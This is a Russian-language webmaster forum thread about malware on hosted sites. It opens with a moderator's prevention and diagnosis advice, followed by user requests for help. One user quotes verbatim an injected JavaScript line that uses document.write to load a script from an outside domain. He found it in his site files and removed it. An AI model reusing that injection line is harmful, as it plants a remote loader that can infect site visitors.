|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
kopasov
Сообщений: 114
Сообщение # 1336 |
21:44:12
05 Май 2014
Здравствуйте! Я 06 февраля 2014 года купил шаблон Puzzle http://utemplate.pro/shop/215/desc/puzzle ,все бы ничего, но вот сегодня меня расстроили таким известием что файл ui.js имеет вредоносный код, выявили его методом проверки, вот ссылка с проверкой http://sitecheck.sucuri.net/results/gamer-mods.ru/, очень все плохо оказывается ,вот такие вот дела, что делать ума не приложу. Вот например подобный сайт с проверкой http://sitecheck.sucuri.net/results/tesall.ru/ и сайт как видно чистый (это просто пример), а вот результат проверки моего сайта http://sitecheck.sucuri.net/results/gamer-mods.ru/ , явно указано на вредоносный код в ui.js ,спасибо за любой ответ и помощь!
Сообщение отредактировал kopasov - Понедельник, 05 Май 2014, 21:51:26
|
webanet
Сообщений: 24067
Сообщение # 1337 |
21:55:36
05 Май 2014
kopasov, а почему вы не зададите свой вопрос создателям хорошего онлайн сервиса на котором проверяли сайт? напишите им и спросите почему он не осилил шифрование в так называемом купленном шаблоне. просто ваш хороший сервис не смог расшифровать содержимое данного скрипта
а на купленных шаблонах такого шифрования не должно быть
и в следующий раз читайте правила подачи заявки, чтобы не выковыривать ссылку на сайт из вашего хорошего сервиса
|
kopasov
Сообщений: 114
Сообщение # 1338 |
22:29:51
05 Май 2014
Цитата webanet (  ) а почему вы не зададите свой вопрос создателям хорошего онлайн сервиса на котором проверяли сайт? напишите им и спросите почему он не осилил шифрование в так называемом купленном шаблоне. просто ваш хороший сервис не смог расшифровать содержимое данного скриптаа на купленных шаблонах такого шифрования не должно быть
и в следующий раз читайте правила подачи заявки, чтобы не выковыривать ссылку на сайт из вашего хорошего сервиса
|
webanet
Сообщений: 24067
Сообщение # 1339 |
22:37:20
05 Май 2014
kopasov, ну значит там так продают. обычно шифрование на купленных снимается.
в любом случае вируса на сайте нет. все претензии к движку вашего сервиса. он просто не смог осилить шифрование
не пользуйтесь вы этими проверками. толку от них нет все равно
|
kopasov
Сообщений: 114
Сообщение # 1340 |
22:44:25
05 Май 2014
Цитата webanet ( ) ну значит там так продают. обычно шифрование на купленных снимается.в любом случае вируса на сайте нет. все претензии к движку вашего сервиса. он просто не смог осилить шифрование
не пользуйтесь вы этими проверками. толку от них нет все равно
|
Админ-инфо
Сообщений: 4
Сообщение # 1341 |
14:05:03
12 Май 2014
|
$Vladimir$
Сообщений: 7465
Сообщение # 1342 |
14:48:08
12 Май 2014
Админ-инфо, обратитесь непосредственно к разработчикам вашего антивирусного ПО. Данный вердикт является результатом поведенческого анализа. Вирусов на сайтах нет.
|
Жукан
Сообщений: 104
Сообщение # 1343 |
22:49:17
14 Май 2014
Всем доброго времени суток, у меня появилась огромная проблема, мой сайт заблокировали по причине:
Аккаунт заблокирован
Причина блокировки: Malware.
Целенаправленно я ничего не распространял, занимался сайтом какое - то время, довольно продолжительное, потом "Забросил" на 5-6 месяцев, в итоге решил сегодня зайти и проплатить "Базовый" для продолжения работы, и получаю такое вот сообщение. Помогите что мне делать? Я написал в ТП, но я в курсе, что ТП ucoz работает от балды, извиняюсь за выражение. Поэтому прошу помощи, здесь, как мне быть? Как действовать? Как отыскать эту заразу? Помогите пожалуйста.
|
webanet
Сообщений: 24067
Сообщение # 1344 |
22:51:43
14 Май 2014
Жукан, если написали в тех.поддержку, то ждите ответа и не надо смелых выводов от балды. сайты просто так не блочат. а на форуме нет кнопки разблочить сайт точно
|
Жукан
Сообщений: 104
Сообщение # 1345 |
23:01:41
14 Май 2014
По идее я нашел в скиптах странную строку, которой раньше не было, вопрос как она туда прописалась сама? Учитывая что скрипты лежат на хосте сайта уже? Как так могло произойти?
Вот такая фигня прописалась в скрипты: (НЕ ЗАХОДИТЕ ПО ССЫЛКЕ)
new site();
/*0f9d38*/
document.write('<script type="text/javascript" src="http://yourtravelguides.com/mz4cdNgP.php?id=601684"></script>');
/*/0f9d38*/
В общем коды то я поснимал, где нашел, как теперь решать вопрос с разблокировкой сайта и убедиться что не где не осталось? этой заразы?
И что больше всего меня интересует, как это там прописалось?Добавлено (14 Май 2014, 23:01:41)
---------------------------------------------
webanet, Я не говорю что его заблочили просто так, я лишь спрашивал что мне теперь делать? куда писать? и как это произошло?. Скрипты почистил, где нашел "заразу", что можете посоветовать?
|
webanet
Сообщений: 24067
Сообщение # 1346 |
23:13:30
14 Май 2014
Жукан, если очистили то ждите ответ тех.поддержки. в течении трех суток примерно
Цитата И что больше всего меня интересует, как это там прописалось?
|
Жукан
Сообщений: 104
Сообщение # 1347 |
23:23:15
14 Май 2014
webanet, Я очистил, но уже сам после того как написал в ТП, мне стоит дописать вторым сообщением, что очистил? или же как быть?Добавлено (14 Май 2014, 23:23:15)
---------------------------------------------
webanet,
По поводу каждый раз при новом подключении менять FTP пароль, думаю вполне хорошая идея, спасибо, возьму на заметку.
|
webanet
Сообщений: 24067
Сообщение # 1348 |
23:43:19
14 Май 2014
Жукан, допишите что очистили все
|
Жукан
Сообщений: 104
Сообщение # 1349 |
00:02:09
15 Май 2014
webanet, Спасибо большое за помощь, жду сообщения теперь от ТП, я надеюсь это не займет большого периода времени.
|
zvartnoz
Сообщений: 20
Сообщение # 1350 |
06:41:34
17 Май 2014
не могу найти вредоносный скрипт, но он есть, помогите найти на сайте
Заходите в гости
http://yurpom24.ucoz.ru/
|
Чат сообщества
)
